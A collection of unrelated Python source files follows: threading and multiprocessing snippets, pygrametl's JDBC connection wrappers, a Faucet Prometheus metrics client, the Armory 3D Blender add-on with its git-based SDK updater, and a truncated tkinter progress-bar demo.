http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import threading
def threaded(func):
def delegate(context):
t = threading.Thread(target=func, args=(context,));
t.start();
delegate.__module__ = func.__module__
delegate.__name__ = func.__name__
delegate.__doc__ = func.__doc__
return delegate
|
multipro.py
|
#/usr/bin/env python
#coding=utf8
"""
# Author: kellanfan
# Created Time : Tue 18 Jul 2017 08:14:59 PM CST
# File Name: multipro.py
# Description:
"""
from multiprocessing import Process
import os
# 子进程要执行的代码
def run_proc(name):
print 'Run child process %s (%s)...' % (name, os.getpid())
if __name__=='__main__':
print 'Parent process %s.' % os.getpid()
p = Process(target=run_proc, args=('test',))
print 'Process will start.'
p.start()
p.join()
print 'Process end.'
|
JDBCConnectionWrapper.py
|
"""This module holds a ConnectionWrapper that is used with a
JDBC Connection. The module should only be used when running Jython.
"""
# Copyright (c) 2009-2014, Aalborg University (pygrametl@cs.aau.dk)
# All rights reserved.
# Redistribution and use in source anqd binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from copy import copy as pcopy
from sys import modules
from threading import Thread
import java.sql as jdbc
import pygrametl
from pygrametl.FIFODict import FIFODict
# Needed for both pip2 and pip3 to be supported
try:
from Queue import Queue
except ImportError:
from queue import Queue
# NOTE: This module is made for Jython.
__author__ = "Christian Thomsen"
__maintainer__ = "Christian Thomsen"
__version__ = '2.3'
__all__ = ['JDBCConnectionWrapper', 'BackgroundJDBCConnectionWrapper']
class JDBCConnectionWrapper(object):
"""Wrap a JDBC Connection.
All Dimension and FactTable communicate with the data warehouse using
a ConnectionWrapper. In this way, the code for loading the DW does not
have to care about which parameter format is used.
This ConnectionWrapper is a special one for JDBC in Jython.
"""
def __init__(self, jdbcconn, stmtcachesize=20):
"""Create a ConnectionWrapper around the given JDBC connection.
If no default ConnectionWrapper already exists, the new
ConnectionWrapper is set to be the default ConnectionWrapper.
Arguments:
- jdbcconn: An open JDBC Connection (not a PEP249 Connection)
- stmtcachesize: The maximum number of PreparedStatements kept
open. Default: 20.
"""
if not isinstance(jdbcconn, jdbc.Connection):
raise TypeError('1st argument must implement java.sql.Connection')
if jdbcconn.isClosed():
raise ValueError('1st argument must be an open Connection')
self.__jdbcconn = jdbcconn
# Add a finalizer to __prepstmts to close PreparedStatements when
# they are pushed out
self.__prepstmts = FIFODict(stmtcachesize, lambda k, v: v[0].close())
self.__resultmeta = FIFODict(stmtcachesize)
self.__resultset = None
self.__resultnames = None
self.__resulttypes = None
self.nametranslator = lambda s: s
self.__jdbcconn.setAutoCommit(False)
if pygrametl._defaulttargetconnection is None:
pygrametl._defaulttargetconnection = self
def __preparejdbcstmt(self, sql):
# Find pyformat arguments and change them to question marks while
# appending the attribute names to a list
names = []
newsql = sql
while True:
start = newsql.find('%(')
if start == -1:
break
end = newsql.find(')s', start)
if end == -1:
break
name = newsql[start + 2: end]
names.append(name)
newsql = newsql.replace(newsql[start:end + 2], '?', 1)
ps = self.__jdbcconn.prepareStatement(newsql)
# Find parameter types
types = []
parmeta = ps.getParameterMetaData()
for i in range(len(names)):
types.append(parmeta.getParameterType(i + 1))
self.__prepstmts[sql] = (ps, names, types)
def __executejdbcstmt(self, sql, args):
if self.__resultset:
self.__resultset.close()
if sql not in self.__prepstmts:
self.__preparejdbcstmt(sql)
(ps, names, types) = self.__prepstmts[sql]
# Not very Pythonic, but we're doing Java
for pos in range(len(names)):
if args[names[pos]] is None:
ps.setNull(pos + 1, types[pos])
else:
ps.setObject(pos + 1, args[names[pos]], types[pos])
if ps.execute():
self.__resultset = ps.getResultSet()
if sql not in self.__resultmeta:
self.__resultmeta[sql] = \
self.__extractresultmetadata(self.__resultset)
(self.__resultnames, self.__resulttypes) = self.__resultmeta[sql]
else:
self.__resultset = None
(self.__resultnames, self.__resulttypes) = (None, None)
def __extractresultmetadata(self, resultset):
# Get jdbc resultset metadata. extract names and types
# and add it to self.__resultmeta
meta = resultset.getMetaData()
names = []
types = []
for col in range(meta.getColumnCount()):
names.append(meta.getColumnName(col + 1))
types.append(meta.getColumnType(col + 1))
return (names, types)
def __readresultrow(self):
if self.__resultset is None:
return None
result = []
for i in range(len(self.__resulttypes)):
e = self.__resulttypes[i] # Not Pythonic, but we need i for JDBC
if e in (jdbc.Types.CHAR, jdbc.Types.VARCHAR,
jdbc.Types.LONGVARCHAR):
result.append(self.__resultset.getString(i + 1))
elif e in (jdbc.Types.BIT, jdbc.Types.BOOLEAN):
result.append(self.__resultset.getBool(i + 1))
elif e in (jdbc.Types.TINYINT, jdbc.Types.SMALLINT,
jdbc.Types.INTEGER):
result.append(self.__resultset.getInt(i + 1))
elif e in (jdbc.Types.BIGINT, ):
result.append(self.__resultset.getLong(i + 1))
elif e in (jdbc.Types.DATE, ):
result.append(self.__resultset.getDate(i + 1))
elif e in (jdbc.Types.TIMESTAMP, ):
result.append(self.__resultset.getTimestamp(i + 1))
elif e in (jdbc.Types.TIME, ):
result.append(self.__resultset.getTime(i + 1))
else:
# Try this and hope for the best...
result.append(self.__resultset.getString(i + 1))
return tuple(result)
def execute(self, stmt, arguments=None, namemapping=None, ignored=None):
"""Execute a statement.
Arguments:
- stmt: the statement to execute
- arguments: a mapping with the arguments. Default: None.
- namemapping: a mapping of names such that if stmt uses %(arg)s
and namemapping[arg]=arg2, the value arguments[arg2] is used
instead of arguments[arg]
- ignored: An ignored argument only present to accept the same
number of arguments as ConnectionWrapper.execute
"""
if namemapping and arguments:
arguments = pygrametl.copy(arguments, **namemapping)
self.__executejdbcstmt(stmt, arguments)
def executemany(self, stmt, params, ignored=None):
"""Execute a sequence of statements.
Arguments:
- stmt: the statement to execute
- params: a sequence of arguments
- ignored: An ignored argument only present to accept the same
number of arguments as ConnectionWrapper.executemany
"""
for paramset in params:
self.__executejdbcstmt(stmt, paramset)
def rowfactory(self, names=None):
"""Return a generator object returning result rows (i.e. dicts)."""
if names is None:
if self.__resultnames is None:
return
else:
names = [self.nametranslator(t) for t in self.__resultnames]
empty = (None, ) * len(self.__resultnames)
while True:
datatuple = self.fetchonetuple()
if datatuple == empty:
return
yield dict(zip(names, datatuple))
def fetchone(self, names=None):
"""Return one result row (i.e. dict)."""
if self.__resultset is None:
return {}
if names is None:
names = [self.nametranslator(t) for t in self.__resultnames]
values = self.fetchonetuple()
return dict(zip(names, values))
def fetchonetuple(self):
"""Return one result tuple."""
if self.__resultset is None:
return ()
if not self.__resultset.next():
return (None, ) * len(self.__resultnames)
else:
return self.__readresultrow()
def fetchmanytuples(self, cnt):
"""Return cnt result tuples."""
if self.__resultset is None:
return []
empty = (None, ) * len(self.__resultnames)
result = []
for _ in range(cnt):
tmp = self.fetchonetuple()
if tmp == empty:
break
result.append(tmp)
return result
def fetchalltuples(self):
"""Return all result tuples"""
if self.__resultset is None:
return []
result = []
empty = (None, ) * len(self.__resultnames)
while True:
tmp = self.fetchonetuple()
if tmp == empty:
return result
result.append(tmp)
def rowcount(self):
"""Not implemented. Return 0. Should return the size of the result."""
return 0
def getunderlyingmodule(self):
"""Return a reference to the underlying connection's module."""
return modules[self.__class__.__module__]
def commit(self):
"""Commit the transaction."""
pygrametl.endload()
self.__jdbcconn.commit()
def close(self):
"""Close the connection to the database,"""
if pygrametl._defaulttargetconnection is self:
pygrametl._defaulttargetconnection = None
self.__jdbcconn.close()
def rollback(self):
"""Rollback the transaction."""
self.__jdbcconn.rollback()
def setasdefault(self):
"""Set this ConnectionWrapper as the default connection."""
pygrametl._defaulttargetconnection = self
def cursor(self):
"""Not implemented for this JDBC connection wrapper!"""
raise NotImplementedError(".cursor() not supported")
def resultnames(self):
if self.__resultnames is None:
return None
else:
return tuple(self.__resultnames)
# BackgroundJDBCConnectionWrapper is added for experiments. It is quite similar
# to JDBCConnectionWrapper and one of them may be removed.
class BackgroundJDBCConnectionWrapper(object):
"""Wrap a JDBC Connection and do all DB communication in the background.
All Dimension and FactTable communicate with the data warehouse using
a ConnectionWrapper. In this way, the code for loading the DW does not
have to care about which parameter format is used.
This ConnectionWrapper is a special one for JDBC in Jython and does DB
communication from a Thread.
.. Note::
BackgroundJDBCConnectionWrapper is added for experiments.
It is quite similar to JDBCConnectionWrapper and one of them may be
removed.
"""
def __init__(self, jdbcconn, stmtcachesize=20):
"""Create a ConnectionWrapper around the given JDBC connection
Arguments:
- jdbcconn: An open JDBC Connection (not a PEP249 Connection)
- stmtcachesize: The maximum number of PreparedStatements kept
open. Default: 20.
"""
self.__jdbcconn = jdbcconn
# Add a finalizer to __prepstmts to close PreparedStatements when
# they are pushed out
self.__prepstmts = FIFODict(stmtcachesize, lambda k, v: v[0].close())
self.__resultmeta = FIFODict(stmtcachesize)
self.__resultset = None
self.__resultnames = None
self.__resulttypes = None
self.nametranslator = lambda s: s
self.__jdbcconn.setAutoCommit(False)
self.__queue = Queue(5000)
t = Thread(target=self.__worker)
t.setDaemon(True) # NB: "t.daemon = True" does NOT work...
t.setName('BackgroundJDBCConnectionWrapper')
t.start()
def __worker(self):
while True:
(sql, args) = self.__queue.get()
self.__executejdbcstmt(sql, args)
self.__queue.task_done()
def __preparejdbcstmt(self, sql):
# Find pyformat arguments and change them to question marks while
# appending the attribute names to a list
names = []
newsql = sql
while True:
start = newsql.find('%(')
if start == -1:
break
end = newsql.find(')s', start)
if end == -1:
break
name = newsql[start + 2: end]
names.append(name)
newsql = newsql.replace(newsql[start:end + 2], '?', 1)
ps = self.__jdbcconn.prepareStatement(newsql)
# Find parameter types
types = []
parmeta = ps.getParameterMetaData()
for i in range(len(names)):
types.append(parmeta.getParameterType(i + 1))
self.__prepstmts[sql] = (ps, names, types)
def __executejdbcstmt(self, sql, args):
if self.__resultset:
self.__resultset.close()
if sql not in self.__prepstmts:
self.__preparejdbcstmt(sql)
(ps, names, types) = self.__prepstmts[sql]
# Not very Pythonic, but we're doing Java
for pos in range(len(names)):
if args[names[pos]] is None:
ps.setNull(pos + 1, types[pos])
else:
ps.setObject(pos + 1, args[names[pos]], types[pos])
if ps.execute():
self.__resultset = ps.getResultSet()
if sql not in self.__resultmeta:
self.__resultmeta[sql] = \
self.__extractresultmetadata(self.__resultset)
(self.__resultnames, self.__resulttypes) = self.__resultmeta[sql]
else:
self.__resultset = None
(self.__resultnames, self.__resulttypes) = (None, None)
def __extractresultmetadata(self, resultset):
# Get jdbc resultset metadata. extract names and types
# and add it to self.__resultmeta
meta = resultset.getMetaData()
names = []
types = []
for col in range(meta.getColumnCount()):
names.append(meta.getColumnName(col + 1))
types.append(meta.getColumnType(col + 1))
return (names, types)
def __readresultrow(self):
if self.__resultset is None:
return None
result = []
for i in range(len(self.__resulttypes)):
e = self.__resulttypes[i] # Not Pythonic, but we need i for JDBC
if e in (jdbc.Types.CHAR, jdbc.Types.VARCHAR,
jdbc.Types.LONGVARCHAR):
result.append(self.__resultset.getString(i + 1))
elif e in (jdbc.Types.BIT, jdbc.Types.BOOLEAN):
result.append(self.__resultset.getBool(i + 1))
elif e in (jdbc.Types.TINYINT, jdbc.Types.SMALLINT,
jdbc.Types.INTEGER):
result.append(self.__resultset.getInt(i + 1))
elif e in (jdbc.Types.BIGINT, ):
result.append(self.__resultset.getLong(i + 1))
elif e in (jdbc.Types.DATE, ):
result.append(self.__resultset.getDate(i + 1))
elif e in (jdbc.Types.TIMESTAMP, ):
result.append(self.__resultset.getTimestamp(i + 1))
elif e in (jdbc.Types.TIME, ):
result.append(self.__resultset.getTime(i + 1))
else:
# Try this and hope for the best...
result.append(self.__resultset.getString(i + 1))
return tuple(result)
def execute(self, stmt, arguments=None, namemapping=None, ignored=None):
"""Execute a statement.
Arguments:
- stmt: the statement to execute
- arguments: a mapping with the arguments. Default: None.
- namemapping: a mapping of names such that if stmt uses %(arg)s
and namemapping[arg]=arg2, the value arguments[arg2] is used
instead of arguments[arg]
- ignored: An ignored argument only present to accept the same
number of arguments as ConnectionWrapper.execute
"""
if namemapping and arguments:
arguments = pygrametl.copy(arguments, **namemapping)
else:
arguments = pcopy(arguments)
self.__queue.put((stmt, arguments))
def executemany(self, stmt, params, ignored=None):
"""Execute a sequence of statements.
Arguments:
- stmt: the statement to execute
- params: a sequence of arguments
- ignored: An ignored argument only present to accept the same
number of arguments as ConnectionWrapper.executemany
"""
for paramset in params:
self.__queue.put((stmt, paramset))
def rowfactory(self, names=None):
"""Return a generator object returning result rows (i.e. dicts)."""
self.__queue.join()
if names is None:
if self.__resultnames is None:
return
else:
names = [self.nametranslator(t) for t in self.__resultnames]
empty = (None, ) * len(self.__resultnames)
while True:
datatuple = self.fetchonetuple()
if datatuple == empty:
return
yield dict(zip(names, datatuple))
def fetchone(self, names=None):
"""Return one result row (i.e. dict)."""
self.__queue.join()
if self.__resultset is None:
return {}
if names is None:
names = [self.nametranslator(t) for t in self.__resultnames]
values = self.fetchonetuple()
return dict(zip(names, values))
def fetchonetuple(self):
"""Return one result tuple."""
self.__queue.join()
if self.__resultset is None:
return ()
if not self.__resultset.next():
return (None, ) * len(self.__resultnames)
else:
return self.__readresultrow()
def fetchmanytuples(self, cnt):
"""Return cnt result tuples."""
self.__queue.join()
if self.__resultset is None:
return []
empty = (None, ) * len(self.__resultnames)
result = []
for _ in range(cnt):
tmp = self.fetchonetuple()
if tmp == empty:
break
result.append(tmp)
return result
def fetchalltuples(self):
"""Return all result tuples"""
self.__queue.join()
if self.__resultset is None:
return []
result = []
empty = (None, ) * len(self.__resultnames)
while True:
tmp = self.fetchonetuple()
if tmp == empty:
return result
result.append(tmp)
def rowcount(self):
"""Not implemented. Return 0. Should return the size of the result."""
return 0
def getunderlyingmodule(self):
"""Return a reference to the underlying connection's module."""
return modules[self.__class__.__module__]
def commit(self):
"""Commit the transaction."""
pygrametl.endload()
self.__queue.join()
self.__jdbcconn.commit()
def close(self):
"""Close the connection to the database,"""
if pygrametl._defaulttargetconnection is self:
pygrametl._defaulttargetconnection = None
self.__queue.join()
self.__jdbcconn.close()
def rollback(self):
"""Rollback the transaction."""
self.__queue.join()
self.__jdbcconn.rollback()
def setasdefault(self):
"""Set this ConnectionWrapper as the default connection."""
pygrametl._defaulttargetconnection = self
def cursor(self):
"""Not implemented for this JDBC connection wrapper!"""
raise NotImplementedError(".cursor() not supported")
def resultnames(self):
self.__queue.join()
if self.__resultnames is None:
return None
else:
return tuple(self.__resultnames)
def Date(year, month, day):
date = '%s-%s-%s' % \
(str(year).zfill(4), str(month).zfill(2), str(day).zfill(2))
return jdbc.Date.valueOf(date)
def Timestamp(year, month, day, hour, minute, second):
date = '%s-%s-%s %s:%s:%s' % \
(str(year).zfill(4), str(month).zfill(2), str(day).zfill(2),
str(hour).zfill(2), str(minute).zfill(2), str(second).zfill(2))
return jdbc.Timestamp.valueOf(date)
|
prom_client.py
|
"""Implement Prometheus client."""
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2015 Brad Cowie, Christopher Lorier and Joe Stringer.
# Copyright (C) 2015 Research and Education Advanced Network New Zealand Ltd.
# Copyright (C) 2015--2019 The Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from urllib.parse import parse_qs
from ryu.lib import hub
from pbr.version import VersionInfo
from prometheus_client import Gauge as PromGauge
from prometheus_client import generate_latest, CONTENT_TYPE_LATEST, REGISTRY
# Ryu's WSGI implementation doesn't always set QUERY_STRING
def make_wsgi_app(registry):
"""Create a WSGI app which serves the metrics from a registry."""
def prometheus_app(environ, start_response):
query_str = environ.get('QUERY_STRING', '')
params = parse_qs(query_str)
reg = registry
if 'name[]' in params:
reg = reg.restricted_registry(params['name[]'])
output = generate_latest(reg)
status = str('200 OK')
headers = [(str('Content-type'), CONTENT_TYPE_LATEST)]
start_response(status, headers)
return [output]
return prometheus_app
class PromClient: # pylint: disable=too-few-public-methods
"""Prometheus client."""
REQUIRED_LABELS = ['dp_id', 'dp_name']
_reg = REGISTRY
def __init__(self, reg=None):
if reg is not None:
self._reg = reg
# TODO: investigate faster alternative (https://bugs.launchpad.net/pbr/+bug/1688405)
self.version = VersionInfo('faucet').semantic_version().release_string()
self.faucet_version = PromGauge( # pylint: disable=unexpected-keyword-arg
'faucet_pbr_version',
'Faucet PBR version',
['version'],
registry=self._reg)
self.faucet_version.labels(version=self.version).set(1) # pylint: disable=no-member
self.server = None
self.thread = None
def start(self, prom_port, prom_addr, use_test_thread=False):
"""Start webserver."""
if not self.server:
app = make_wsgi_app(self._reg)
if use_test_thread:
# pylint: disable=import-outside-toplevel
from wsgiref.simple_server import (
make_server, WSGIRequestHandler)
import threading
class NoLoggingWSGIRequestHandler(WSGIRequestHandler):
"""Don't log requests."""
def log_message(self, *_args): # pylint: disable=arguments-differ
pass
self.server = make_server(
prom_addr, int(prom_port), app, handler_class=NoLoggingWSGIRequestHandler)
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.daemon = True
self.thread.start()
else:
self.server = hub.WSGIServer((prom_addr, int(prom_port)), app)
self.thread = hub.spawn(self.server.serve_forever)
self.thread.name = 'prometheus'
|
armory.py
|
# Armory 3D Engine
# https://github.com/armory3d/armory
bl_info = {
"name": "Armory",
"category": "Render",
"location": "Properties -> Render -> Armory Player",
"description": "3D Game Engine for Blender",
"author": "Armory3D.org",
"version": (0, 6, 0),
"blender": (2, 80, 0),
"wiki_url": "http://armory3d.org/manual",
"tracker_url": "https://github.com/armory3d/armory/issues"
}
import os
import sys
import stat
import shutil
import webbrowser
import subprocess
import threading
import bpy
import platform
from bpy.types import Operator, AddonPreferences
from bpy.props import *
from bpy.app.handlers import persistent
def get_os():
s = platform.system()
if s == 'Windows':
return 'win'
elif s == 'Darwin':
return 'mac'
else:
return 'linux'
class ArmoryAddonPreferences(AddonPreferences):
bl_idname = __name__
def sdk_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.sdk_path = bpy.path.reduce_dirs([bpy.path.abspath(self.sdk_path)])[0] + '/'
def ffmpeg_path_update(self, context):
if self.skip_update or self.ffmpeg_path == '':
return
self.skip_update = True
self.ffmpeg_path = bpy.path.reduce_dirs([bpy.path.abspath(self.ffmpeg_path)])[0]
def renderdoc_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.renderdoc_path = bpy.path.reduce_dirs([bpy.path.abspath(self.renderdoc_path)])[0]
sdk_bundled: BoolProperty(name="Bundled SDK", default=True)
sdk_path: StringProperty(name="SDK Path", subtype="FILE_PATH", update=sdk_path_update, default="")
show_advanced: BoolProperty(name="Show Advanced", default=False)
player_gapi_win: EnumProperty(
items = [('direct3d11', 'Auto', 'direct3d11'),
('opengl', 'OpenGL', 'opengl'),
('direct3d11', 'Direct3D11', 'direct3d11')],
name="Player Graphics API", default='direct3d11', description='Use this graphics API when launching the game in Krom player(F5)')
player_gapi_linux: EnumProperty(
items = [('opengl', 'Auto', 'opengl'),
('opengl', 'OpenGL', 'opengl')],
name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
player_gapi_mac: EnumProperty(
items = [('opengl', 'Auto', 'opengl'),
('opengl', 'OpenGL', 'opengl')],
name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
code_editor: EnumProperty(
items = [('kodestudio', 'Kode Studio', 'kodestudio'),
('default', 'System Default', 'default')],
name="Code Editor", default='kodestudio', description='Use this editor for editing scripts')
ui_scale: FloatProperty(name='UI Scale', description='Adjust UI scale for Armory tools', default=1.0, min=1.0, max=4.0)
khamake_threads: IntProperty(name='Khamake Threads', description='Allow Khamake to spawn multiple processes for faster builds', default=4, min=1)
renderdoc_path: StringProperty(name="RenderDoc Path", description="Binary path", subtype="FILE_PATH", update=renderdoc_path_update, default="")
ffmpeg_path: StringProperty(name="FFMPEG Path", description="Binary path", subtype="FILE_PATH", update=ffmpeg_path_update, default="")
save_on_build: BoolProperty(name="Save on Build", description="Save .blend", default=False)
legacy_shaders: BoolProperty(name="Legacy Shaders", description="Attempt to compile shaders runnable on older hardware", default=False)
relative_paths: BoolProperty(name="Generate Relative Paths", description="Write relative paths in khafile", default=False)
viewport_controls: EnumProperty(
items=[('qwerty', 'qwerty', 'qwerty'),
('azerty', 'azerty', 'azerty')],
name="Viewport Controls", default='qwerty', description='Viewport camera mode controls')
skip_update: BoolProperty(name="", default=False)
def draw(self, context):
self.skip_update = False
layout = self.layout
layout.label(text="Welcome to Armory! Click 'Save Preferences' at the bottom to keep Armory enabled.")
p = bundled_sdk_path()
if os.path.exists(p):
layout.prop(self, "sdk_bundled")
if not self.sdk_bundled:
layout.prop(self, "sdk_path")
else:
layout.prop(self, "sdk_path")
box = layout.box().column()
box.label(text="Armory Updater")
box.label(text="Note: Development version may run unstable!")
row = box.row(align=True)
row.alignment = 'EXPAND'
row.operator("arm_addon.help", icon="URL")
row.operator("arm_addon.update", icon="FILE_REFRESH")
row.operator("arm_addon.restore")
box.label(text="Check console for download progress. Please restart Blender after successful SDK update.")
layout.prop(self, "show_advanced")
if self.show_advanced:
box = layout.box().column()
box.prop(self, "player_gapi_" + get_os())
box.prop(self, "code_editor")
box.prop(self, "renderdoc_path")
box.prop(self, "ffmpeg_path")
box.prop(self, "viewport_controls")
box.prop(self, "ui_scale")
box.prop(self, "khamake_threads")
box.prop(self, "save_on_build")
box.prop(self, "legacy_shaders")
box.prop(self, "relative_paths")
def bundled_sdk_path():
if get_os() == 'mac':
# SDK on MacOS is located in .app folder due to security
p = bpy.app.binary_path
if p.endswith('Contents/MacOS/blender'):
return p[:-len('Contents/MacOS/blender')] + '/armsdk/'
else:
return p[:-len('Contents/MacOS/./blender')] + '/armsdk/'
elif get_os() == 'linux':
# /blender
return bpy.app.binary_path.rsplit('/', 1)[0] + '/armsdk/'
else:
# /blender.exe
return bpy.app.binary_path.replace('\\', '/').rsplit('/', 1)[0] + '/armsdk/'
def get_fp():
if bpy.data.filepath == '':
return ''
s = bpy.data.filepath.split(os.path.sep)
s.pop()
return os.path.sep.join(s)
def get_sdk_path(context):
preferences = context.preferences
addon_prefs = preferences.addons["armory"].preferences
p = bundled_sdk_path()
if os.path.exists(get_fp() + '/armsdk'):
return get_fp() + '/armsdk'
elif os.path.exists(p) and addon_prefs.sdk_bundled:
return p
else:
return addon_prefs.sdk_path
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
def git_clone(done, p, gitn, n, recursive=False):
if not os.path.exists(p + '/' + n + '_backup'):
os.rename(p + '/' + n, p + '/' + n + '_backup')
if os.path.exists(p + '/' + n):
shutil.rmtree(p + '/' + n, onerror=remove_readonly)
if recursive:
run_proc(['git', 'clone', '--recursive', 'https://github.com/' + gitn, p + '/' + n, '--depth', '1', '--shallow-submodules', '--jobs', '4'], done)
else:
run_proc(['git', 'clone', 'https://github.com/' + gitn, p + '/' + n, '--depth', '1'], done)
def restore_repo(p, n):
if os.path.exists(p + '/' + n + '_backup'):
if os.path.exists(p + '/' + n):
shutil.rmtree(p + '/' + n, onerror=remove_readonly)
os.rename(p + '/' + n + '_backup', p + '/' + n)
class ArmAddonStartButton(bpy.types.Operator):
'''Start Armory integration'''
bl_idname = "arm_addon.start"
bl_label = "Start"
running = False
def execute(self, context):
sdk_path = get_sdk_path(context)
if sdk_path == "":
print("Configure Armory SDK path first")
return {"CANCELLED"}
scripts_path = sdk_path + "/armory/blender/"
sys.path.append(scripts_path)
local_sdk = os.path.exists(get_fp() + '/armsdk')
import start
start.register(local_sdk=local_sdk)
ArmAddonStartButton.running = True
return {"FINISHED"}
class ArmAddonStopButton(bpy.types.Operator):
'''Stop Armory integration'''
bl_idname = "arm_addon.stop"
bl_label = "Stop"
def execute(self, context):
import start
start.unregister()
ArmAddonStartButton.running = False
return {"FINISHED"}
class ArmAddonUpdateButton(bpy.types.Operator):
'''Update Armory SDK'''
bl_idname = "arm_addon.update"
bl_label = "Update SDK"
bl_description = "Update to the latest development version"
def execute(self, context):
sdk_path = get_sdk_path(context)
if sdk_path == "":
self.report({"ERROR"}, "Configure Armory SDK path first")
return {"CANCELLED"}
self.report({'INFO'}, 'Updating Armory SDK, check console for details.')
print('Armory (add-on v' + str(bl_info['version']) + '): Cloning [armory, iron, haxebullet, haxerecast, zui] repositories')
os.chdir(sdk_path)
global repos_updated
global repos_total
repos_updated = 0
repos_total = 9
def done():
global repos_updated
global repos_total
repos_updated += 1
if repos_updated == repos_total:
print('Armory SDK updated, please restart Blender')
git_clone(done, sdk_path, 'armory3d/armory', 'armory')
git_clone(done, sdk_path, 'armory3d/iron', 'iron')
git_clone(done, sdk_path, 'armory3d/haxebullet', 'lib/haxebullet')
git_clone(done, sdk_path, 'armory3d/haxerecast', 'lib/haxerecast')
git_clone(done, sdk_path, 'armory3d/zui', 'lib/zui')
git_clone(done, sdk_path, 'armory3d/armory_tools', 'lib/armory_tools')
git_clone(done, sdk_path, 'armory3d/iron_format', 'lib/iron_format')
git_clone(done, sdk_path, 'armory3d/Krom_bin', 'Krom')
git_clone(done, sdk_path, 'armory3d/Kha', 'Kha', recursive=True)
return {"FINISHED"}
class ArmAddonRestoreButton(bpy.types.Operator):
'''Update Armory SDK'''
bl_idname = "arm_addon.restore"
bl_label = "Restore SDK"
bl_description = "Restore stable version"
def execute(self, context):
sdk_path = get_sdk_path(context)
if sdk_path == "":
self.report({"ERROR"}, "Configure Armory SDK path first")
return {"CANCELLED"}
os.chdir(sdk_path)
restore_repo(sdk_path, 'armory')
restore_repo(sdk_path, 'iron')
restore_repo(sdk_path, 'lib/haxebullet')
restore_repo(sdk_path, 'lib/haxerecast')
restore_repo(sdk_path, 'lib/zui')
restore_repo(sdk_path, 'lib/armory_tools')
restore_repo(sdk_path, 'lib/iron_format')
restore_repo(sdk_path, 'Kha')
restore_repo(sdk_path, 'Krom')
self.report({'INFO'}, 'Restored stable version')
return {"FINISHED"}
class ArmAddonHelpButton(bpy.types.Operator):
'''Updater help'''
bl_idname = "arm_addon.help"
bl_label = "Help"
bl_description = "Git is required for Armory Updater to work"
def execute(self, context):
webbrowser.open('https://armory3d.org/manual/#/dev/gitversion')
return {"FINISHED"}
@persistent
def on_load_post(context):
if ArmAddonStartButton.running:
return
bpy.ops.arm_addon.start()
def register():
bpy.utils.register_class(ArmoryAddonPreferences)
bpy.utils.register_class(ArmAddonStartButton)
bpy.utils.register_class(ArmAddonStopButton)
bpy.utils.register_class(ArmAddonUpdateButton)
bpy.utils.register_class(ArmAddonRestoreButton)
bpy.utils.register_class(ArmAddonHelpButton)
bpy.app.handlers.load_post.append(on_load_post)
def unregister():
bpy.ops.arm_addon.stop()
bpy.utils.unregister_class(ArmoryAddonPreferences)
bpy.utils.unregister_class(ArmAddonStartButton)
bpy.utils.unregister_class(ArmAddonStopButton)
bpy.utils.unregister_class(ArmAddonUpdateButton)
bpy.utils.unregister_class(ArmAddonRestoreButton)
bpy.utils.unregister_class(ArmAddonHelpButton)
bpy.app.handlers.load_post.remove(on_load_post)
if __name__ == "__main__":
register()
|
progress_bar.py
|
import sys
sys.path.append('../../lib')
from UI import *
from tkinter import filedialog
import time
import threading
FILE_TYPES=[('PDF files', '.pdf'),
('JPG files', '.jpg'),
('PNG files', '.png'),
('Py files', '*.py'),
('all files', '.*')]
cb_thread=None
def open_folder():
global root
rep = filedialog.askdirectory(
parent=root.object,
initialdir=os.getcwd())
print(rep)
def open_file():
global root
rep = filedialog.askopenfilenames(parent=root.object, initialdir=os.getcwd(), filetypes=FILE_TYPES)
print(rep[0])
def callback_func_threaded():
cb_thread = threading.Thread(target=callback_func)
cb_thread.start()
def callback_func():
global obj_progress, cb_thread
obj_progress.start()
for i in range(10):
time.sleep(1)
print(str(i)+"\n")
obj_progress.stop()
cb_thread=None
def main():
global obj_progress, ui_exit
root = BEGIN()
root.title("demo")
root.dimension(500,300)
#root.bg('#555')
root.gotoxy(200,100)
obj_progress = progress_bar(root)
obj_progress.dimension(200,10)
obj_progress.speed(1)
